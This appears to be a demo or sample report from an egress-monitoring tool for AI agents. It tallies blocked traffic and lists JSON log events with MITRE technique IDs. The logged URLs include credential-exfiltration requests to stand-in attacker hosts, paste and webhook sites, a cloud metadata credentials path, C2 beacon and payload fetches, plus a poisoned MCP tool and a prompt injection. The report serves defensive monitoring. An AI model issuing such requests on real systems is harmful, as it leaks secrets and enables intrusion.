Pipelock Agent Egress Report

Category	Count	Severity	MITRE
DLP / Exfiltration	8	critical	T1041, T1048.003
Domain Policy	2	high	T1071.001
MCP / Tool Abuse	2	high	T1059, T1059.007
SSRF	2	high	T1552.005
Prompt Injection	1	high	T1059.007

SURFACE	BLOCKS	WARNS	TOTAL
URL	6	0	6
Request Body	0	1	1
Request Header	0	1	1

AGENT	BLOCKS	WARNS	ALLOWED
10.0.0.2	5	0	19
10.0.0.4	3	1	5
10.0.0.3	2	2	9

TRANSPORT	BLOCKS	WARNS	ALLOWED
HTTP Fetch	10	2	31
MCP	0	1	2

Domain	Total	Breakdown
attacker.example.com	2
169.254.169.254	1
192.168.1.1	1
c2-server.example.com	1
evil-exfil.example.com	1
hnr4kx.oast.fun	1
malware-cdn.example.com	1
pastebin.com	1
webhook.site	1
api.github.com	9
api.anthropic.com	5
api.openai.com	4
api.example.com	2
docs.python.org	2
api.stripe.com	1
cdn.jsdelivr.net	1
crates.io	1
huggingface.co	1
pypi.org	1
registry.npmjs.org	1

TECHNIQUE	COUNT
T1041	7
T1059.007	2
T1071.001	2
T1552.005	2
T1048.003	1
T1059	1

blocked (dlp) : DLP: Anthropic API Key 2026-03-28 09:02:00 UTC

{ "time": "2026-03-28T09:02:00Z", "level": "warn", "event": "blocked", "method": "GET", "url": "https://evil-exfil.example.com/collect?data=sk-ant-api03-secret", "scanner": "dlp", "reason": "DLP: Anthropic API Key", "client_ip": "10.0.0.2", "mitre_technique": "T1041", "pattern": "Anthropic API Key", "severity": "critical", "transport": "fetch", "category": "credential_exfiltration" }

blocked (dlp) : DLP: GitHub Token 2026-03-28 09:02:05 UTC

{ "time": "2026-03-28T09:02:05Z", "level": "warn", "event": "blocked", "method": "POST", "url": "https://pastebin.com/api/api_post.php", "scanner": "dlp", "reason": "DLP: GitHub Token", "client_ip": "10.0.0.2", "mitre_technique": "T1041", "pattern": "GitHub Token", "severity": "critical", "transport": "fetch", "category": "credential_exfiltration" }

blocked (dlp) : DLP: OpenAI API Key 2026-03-28 09:02:10 UTC

{ "time": "2026-03-28T09:02:10Z", "level": "warn", "event": "blocked", "method": "POST", "url": "https://webhook.site/abc123", "scanner": "dlp", "reason": "DLP: OpenAI API Key", "client_ip": "10.0.0.3", "mitre_technique": "T1041", "pattern": "OpenAI API Key", "severity": "critical", "transport": "forward", "category": "credential_exfiltration" }

blocked (dlp) : DLP: AWS Access Key 2026-03-28 09:04:30 UTC

{ "time": "2026-03-28T09:04:30Z", "level": "warn", "event": "blocked", "method": "GET", "url": "https://attacker.example.com/exfil?env=AKIA5X7EXAMPLE", "scanner": "dlp", "reason": "DLP: AWS Access Key", "client_ip": "10.0.0.2", "mitre_technique": "T1041", "pattern": "AWS Access Key", "severity": "critical", "transport": "fetch", "category": "credential_exfiltration" }

body_dlp (body_dlp) : DLP: Stripe Secret Key in request body 2026-03-28 09:05:30 UTC

{ "time": "2026-03-28T09:05:30Z", "level": "warn", "event": "body_dlp", "method": "POST", "url": "https://api.example.com/upload", "scanner": "body_dlp", "reason": "DLP: Stripe Secret Key in request body", "client_ip": "10.0.0.3", "mitre_technique": "T1041", "pattern": "Stripe Secret Key", "severity": "critical", "transport": "forward", "category": "credential_exfiltration" }

blocked (dlp) : DLP: GitHub Personal Access Token 2026-03-28 09:10:30 UTC

{ "time": "2026-03-28T09:10:30Z", "level": "warn", "event": "blocked", "method": "GET", "url": "https://attacker.example.com/steal?token=ghp_abc123example", "scanner": "dlp", "reason": "DLP: GitHub Personal Access Token", "client_ip": "10.0.0.4", "mitre_technique": "T1041", "pattern": "GitHub Personal Access Token", "severity": "critical", "transport": "forward", "category": "credential_exfiltration" }

blocked (ssrf) : SSRF: link-local metadata service 2026-03-28 09:02:30 UTC

{ "time": "2026-03-28T09:02:30Z", "level": "warn", "event": "blocked", "method": "GET", "url": "https://169.254.169.254/latest/meta-data/iam/security-credentials/", "scanner": "ssrf", "reason": "SSRF: link-local metadata service", "client_ip": "10.0.0.2", "mitre_technique": "T1552.005", "severity": "high", "transport": "fetch", "category": "ssrf" }

blocked (ssrf) : SSRF: private IP range 2026-03-28 09:02:35 UTC

{ "time": "2026-03-28T09:02:35Z", "level": "warn", "event": "blocked", "method": "GET", "url": "http://192.168.1.1/admin", "scanner": "ssrf", "reason": "SSRF: private IP range", "client_ip": "10.0.0.3", "mitre_technique": "T1552.005", "severity": "high", "transport": "forward", "category": "ssrf" }

blocked (blocklist) : blocklist: c2-server.example.com 2026-03-28 09:03:00 UTC

{ "time": "2026-03-28T09:03:00Z", "level": "warn", "event": "blocked", "method": "GET", "url": "https://c2-server.example.com/beacon", "scanner": "blocklist", "reason": "blocklist: c2-server.example.com", "client_ip": "10.0.0.4", "mitre_technique": "T1071.001", "severity": "high", "transport": "forward", "category": "c2_communication" }

blocked (blocklist) : blocklist: malware-cdn.example.com 2026-03-28 09:03:05 UTC

{ "time": "2026-03-28T09:03:05Z", "level": "warn", "event": "blocked", "method": "GET", "url": "https://malware-cdn.example.com/payload.bin", "scanner": "blocklist", "reason": "blocklist: malware-cdn.example.com", "client_ip": "10.0.0.4", "mitre_technique": "T1071.001", "severity": "high", "transport": "forward", "category": "c2_communication" }

response_scan (response) : injection: Prompt Injection 2026-03-28 09:05:00 UTC

{ "time": "2026-03-28T09:05:00Z", "level": "warn", "event": "response_scan", "url": "https://untrusted-api.example.com/data", "scanner": "response", "reason": "injection: Prompt Injection", "client_ip": "10.0.0.2", "mitre_technique": "T1059.007", "severity": "high", "transport": "fetch", "category": "prompt_injection" }

header_dlp (header_dlp) : DLP: Bearer token in non-Authorization header 2026-03-28 09:05:45 UTC

{ "time": "2026-03-28T09:05:45Z", "level": "warn", "event": "header_dlp", "method": "POST", "url": "https://api.example.com/webhook", "scanner": "header_dlp", "reason": "DLP: Bearer token in non-Authorization header", "client_ip": "10.0.0.3", "mitre_technique": "T1041", "pattern": "Bearer Token Header", "severity": "high", "transport": "forward", "category": "credential_exfiltration" }

blocked (dlp) : DLP: high entropy subdomain 2026-03-28 09:06:30 UTC

{ "time": "2026-03-28T09:06:30Z", "level": "warn", "event": "blocked", "method": "GET", "url": "https://hnr4kx.oast.fun/exfil", "scanner": "dlp", "reason": "DLP: high entropy subdomain", "client_ip": "10.0.0.2", "mitre_technique": "T1048.003", "pattern": "Subdomain Entropy", "severity": "high", "transport": "fetch", "category": "dns_exfiltration" }

chain_detection (chain) : chain: read-then-exec (file_read -> bash_exec) 2026-03-28 09:07:00 UTC

{ "time": "2026-03-28T09:07:00Z", "level": "warn", "event": "chain_detection", "scanner": "chain", "reason": "chain: read-then-exec (file_read -\u003e bash_exec)", "client_ip": "10.0.0.2", "mitre_technique": "T1059", "severity": "high", "session": "sess-7f3a", "tool": "bash_exec", "transport": "mcp", "category": "tool_chain" }

mcp_unknown_tool (session_binding) : unknown tool: data_exfil_helper (not in session baseline) 2026-03-28 09:07:15 UTC

{ "time": "2026-03-28T09:07:15Z", "level": "warn", "event": "mcp_unknown_tool", "scanner": "session_binding", "reason": "unknown tool: data_exfil_helper (not in session baseline)", "client_ip": "10.0.0.3", "mitre_technique": "T1059.007", "severity": "high", "session": "sess-2b9c", "tool": "data_exfil_helper", "transport": "mcp", "category": "tool_poisoning" }

anomaly (adaptive) : anomaly: agent score escalated to 0.85 (threshold 0.7) 2026-03-28 09:07:30 UTC

{ "time": "2026-03-28T09:07:30Z", "level": "warn", "event": "anomaly", "scanner": "adaptive", "reason": "anomaly: agent score escalated to 0.85 (threshold 0.7)", "client_ip": "10.0.0.4", "score": 0.85, "severity": "high", "session": "sess-4d1e", "transport": "mcp", "category": "behavioral_anomaly" }

Pipelock Agent Egress Report

Activity Timeline

Findings by Category

DLP by Surface

Events by Source

Events by Transport

Top Domains

MITRE ATT&CK Techniques

Evidence Appendix (16 events)